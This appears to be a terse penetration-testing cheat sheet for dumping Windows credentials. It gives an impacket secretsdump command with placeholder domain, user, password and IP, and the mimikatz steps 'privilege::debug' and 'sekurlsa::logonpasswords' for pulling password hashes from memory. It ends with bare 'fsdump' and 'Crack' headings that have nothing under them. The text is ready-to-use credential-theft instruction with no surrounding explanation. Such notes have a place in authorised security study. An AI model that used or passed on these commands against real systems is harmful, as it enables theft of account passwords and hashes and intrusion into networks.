*Using Impacket-secretdump

impacket-secretdump “<domain>/<user>:<password>@<ip>”

*Using mimikatz

  1. Transfer all 3 mimikatz file to run mimikatz.exe from /usr/share/windows-resources/mimikatz/ mimikatz.exe

  2. Give privilege access privilege::debug

  3. sekurlsa::logonpasswords

retrieve password hash

*Using fsdump

Crack